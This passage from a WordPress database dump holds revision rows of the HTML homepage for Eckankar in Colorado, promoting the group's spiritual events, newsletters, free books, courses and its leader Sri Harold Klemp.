1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Home','','inherit','closed','closed','','7160-revision-v1','','','2023-11-18 13:36:17','2023-11-18 20:36:17','',7160,'https://eckankar-colorado.org/?p=269400',0,'revision','',0),(269401,2,'2023-11-18 13:36:40','2023-11-18 20:36:40','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div 